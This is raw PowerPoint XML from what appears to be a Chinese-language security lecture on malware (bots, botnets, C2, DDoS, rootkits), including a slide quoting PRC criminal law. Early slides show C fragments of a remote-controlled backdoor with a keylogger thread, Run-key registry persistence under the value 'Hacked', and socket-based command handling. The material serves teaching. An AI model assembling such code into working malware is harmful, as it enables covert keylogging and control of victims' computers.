              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>str_cut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(buffer,3,100));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("persist", buffer, 7) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>bootRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>keylog_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>", buffer, 12) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			HANDLE thread = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(NULL, 0,logg, NULL, 0, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> jump;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113243649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9BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="0"/>
            <a:ext cx="7808912" cy="7029400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HKEY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>NewVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>RegOpenKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>NewVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) != ERROR_SUCCESS) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		send(sock, err, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(err), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pathLenInBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pathLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>szPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>RegSetValueEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>NewVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, TEXT("Hacked"), 0, REG_SZ, (LPBYTE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>szPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pathLenInBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) != ERROR_SUCCESS) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>RegCloseKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>NewVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		send(sock, err, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(err), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>       }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72171214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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9981F9B2-7085-4878-9604-E719B2DC4257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>僵尸</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30962CE9-4E3B-4145-9CFE-9A96537E9904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>僵尸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(bot)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>robot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的缩写，是指实现恶意控制功能的程序代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量被植入僵尸程序的电脑通过僵尸控制服务器便可以形成僵尸网络。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>僵尸网络（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>），是指采用一种或多种传播手段，将大量主机感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序（僵尸程序），从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。</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lide(fromBottom)">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F3265683-F1A2-4807-9DF5-EEA855D25ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中华人民共和国刑法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97A7908-B385-4A94-B361-327FAB11B8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="1989138"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>第二百八十六条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破坏计算机信息系统罪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。 </a:t>
            </a:r>
          </a:p>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F38CEBB4-D834-4FDE-9AD7-93F69181F094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1347788" y="620713"/>
            <a:ext cx="7620000" cy="1123950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器，接收攻击指令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121859" name="Picture 6" descr="What is a Botnet? Definition, Types, Examples of Attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3466F748-0F4B-45C6-B374-708E39D2A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788" y="1989138"/>
            <a:ext cx="7620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6" descr="What are Distributed Denial of Service (DDoS) Attacks?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C210D643-8E42-459B-BAD2-AF93A40F25DA}"/>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lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122883" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076946B1-7516-4D3C-B038-ED884BEAF6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11413" y="1916113"/>
            <a:ext cx="5761037" cy="4559300"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F949170-4148-4A13-83FC-A187B8340582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="696913"/>
            <a:ext cx="7620000" cy="1123950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>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95000"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>核心目的是控制大量机器，在合适的时机发动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{940E3645-763A-4FCE-90A3-F956091E1624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.6 Rootkit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7263EE5E-E751-4C22-837F-4E6B47100447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>它是由有用的小程序组成的工具包，使得攻击者能够保持访问计算机上具有最高权限的用户“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是能够持久或可靠地、无法被检测地存在于计算机上的一组程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在功能上以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐藏恶意程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为主。</a:t>
            </a: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slide(fromBottom)">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slide(fromBottom)">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AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235E77B8-0FB4-44BA-9421-C524B74C19EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2317750" y="3502025"/>
            <a:ext cx="2735263" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 86323"/>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恶意软件是否存在？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274436" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACAE2C6-EFA3-42E7-A122-9E6F8C7E4378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5918200" y="3429000"/>
            <a:ext cx="1871663" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 59068"/>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查找相关文件？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274437" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7F314F-687A-49CB-936F-5D763ED4DB20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
